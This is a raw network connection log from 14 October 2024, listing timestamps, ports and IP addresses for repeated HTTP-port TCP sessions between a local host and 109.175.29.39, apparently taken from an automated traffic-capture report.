Oct 14, 2024 10:02:44.373238087 CEST	80	49742	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:44.373465061 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.373630047 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.378771067 CEST	80	49742	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:44.378794909 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.384133101 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:44.384390116 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.384479046 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.384479046 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:44.389827967 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:44.389870882 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.213128090 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.213996887 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.214088917 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.214175940 CEST	49743	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.217801094 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.219115973 CEST	80	49743	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.222758055 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.222843885 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.222959995 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.222994089 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:45.227775097 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:45.227946043 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.040815115 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.041796923 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.041902065 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.093352079 CEST	49744	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.098289967 CEST	80	49744	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.112363100 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.117500067 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.117583036 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.120929956 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.120958090 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:46.126019955 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:46.126077890 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.032917976 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.033529997 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.033837080 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.034369946 CEST	49745	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.039154053 CEST	80	49745	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.041243076 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.046165943 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.046246052 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.046334982 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.046350002 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.051202059 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.051282883 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.852401018 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.853426933 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.853497028 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.853559971 CEST	49746	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.856220961 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.858429909 CEST	80	49746	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.861282110 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.861371040 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.861527920 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.861558914 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:47.866297960 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:47.866441965 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.657077074 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.657628059 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.657828093 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.657828093 CEST	49747	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.660762072 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.663192034 CEST	80	49747	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.665842056 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.665921926 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.666071892 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.666121006 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:48.671154976 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:48.671247005 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.459602118 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.462537050 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.462698936 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.462762117 CEST	49748	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.465981007 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.467551947 CEST	80	49748	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.470832109 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.470932007 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.471048117 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.471084118 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:49.475805998 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:49.475956917 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.282727003 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.282918930 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.282988071 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.283077002 CEST	49749	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.286218882 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.287947893 CEST	80	49749	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.291177988 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.291249037 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.291349888 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.291383028 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:50.296133041 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:50.296276093 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.089848995 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.090111971 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.090176105 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.090214968 CEST	49750	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.093189955 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.095118999 CEST	80	49750	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.098108053 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.098185062 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.098297119 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.098311901 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.103131056 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.103230000 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.895728111 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.895889044 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.895963907 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.896034002 CEST	49751	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.901103020 CEST	80	49751	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.907500982 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.912595987 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.912798882 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.912986994 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.913023949 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:51.917823076 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:51.917936087 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.777829885 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.778400898 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.778542042 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.778651953 CEST	49752	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.781461954 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.783560991 CEST	80	49752	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.786422014 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.786501884 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.786597967 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.786632061 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:52.791441917 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:52.792155981 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.594877958 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.594919920 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.595038891 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.595194101 CEST	49753	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.597706079 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.600116968 CEST	80	49753	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.602665901 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.602766991 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.602880955 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.602914095 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:53.607790947 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:53.607940912 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.432265043 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.432451010 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.432534933 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.432605982 CEST	49754	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.435277939 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.437434912 CEST	80	49754	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.440274954 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.440362930 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.440512896 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.440557003 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:54.445312977 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:54.445611000 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.356287003 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.356589079 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.356666088 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.356862068 CEST	49755	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.359462976 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.361706018 CEST	80	49755	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.364439964 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.364516973 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.364646912 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.364675999 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:55.369587898 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:55.369961977 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.160439014 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.161005974 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.161079884 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.161132097 CEST	49756	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.163661957 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.166066885 CEST	80	49756	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.168560028 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.168764114 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.168869972 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.168869972 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.173732042 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.173873901 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.967535973 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.967680931 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.967829943 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.967871904 CEST	49757	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.970235109 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.972856998 CEST	80	49757	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.975229979 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.975310087 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.975419044 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.977700949 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:56.980389118 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:56.982736111 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.801300049 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.802153111 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.802217960 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.802557945 CEST	49758	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.804518938 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.807507038 CEST	80	49758	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.809566021 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.809920073 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.810257912 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.810257912 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:57.815251112 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:57.815341949 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.602148056 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.603007078 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.603168964 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.603260994 CEST	49759	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.606524944 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.608335972 CEST	80	49759	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.611499071 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.611591101 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.611738920 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.611777067 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:58.616776943 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:58.616811991 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.500734091 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.500781059 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.501084089 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.501351118 CEST	49760	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.504414082 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.506295919 CEST	80	49760	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.509593964 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.509684086 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.509779930 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.509802103 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:59.514758110 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:59.514786959 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.324894905 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.324990034 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.325140953 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.325211048 CEST	49761	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.327958107 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.330169916 CEST	80	49761	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.332890034 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.332969904 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.333209991 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.333230972 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:00.337985992 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:00.338177919 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.241354942 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.241477013 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.241528034 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.244995117 CEST	49762	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.249847889 CEST	80	49762	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.398951054 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.404083014 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.404159069 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.404306889 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.404340982 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:01.409140110 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:01.409153938 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.205260992 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.205349922 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.205411911 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.205519915 CEST	49763	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.210397959 CEST	80	49763	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.214718103 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.219717979 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.219791889 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.219935894 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.219971895 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:02.224771023 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:02.224922895 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.013564110 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.013725996 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.013839006 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.014036894 CEST	49764	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.016741037 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.019205093 CEST	80	49764	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.021811008 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.021902084 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.022027969 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.022027969 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.026832104 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.027013063 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.815471888 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.817471981 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.820532084 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.855640888 CEST	49765	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.860541105 CEST	80	49765	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.937942028 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.943032980 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.943108082 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.945909977 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.945910931 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:03.950735092 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:03.950916052 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.822065115 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.822968960 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.823195934 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.823195934 CEST	49766	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.826041937 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.828200102 CEST	80	49766	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.831000090 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.831084967 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.831216097 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.831258059 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:04.836023092 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:04.836163044 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.614105940 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.614420891 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.614746094 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.614870071 CEST	49767	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.617141962 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.619806051 CEST	80	49767	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.622423887 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.622641087 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.622786999 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.622817039 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:05.627614021 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:05.627756119 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.417629004 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.417754889 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.417804956 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.417855024 CEST	49769	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.422831059 CEST	80	49769	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.456892967 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.461868048 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.461940050 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.462102890 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.462138891 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:06.467046022 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:06.467075109 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.311100960 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.311444044 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.311723948 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:07.311794043 CEST	49770	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:07.315206051 CEST	49772	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:07.316705942 CEST	80	49770	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.320128918 CEST	80	49772	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.320271969 CEST	49772	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:07.320449114 CEST	49772	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:07.320485115 CEST	49772	80	192.168.2.4	109.175.29.39
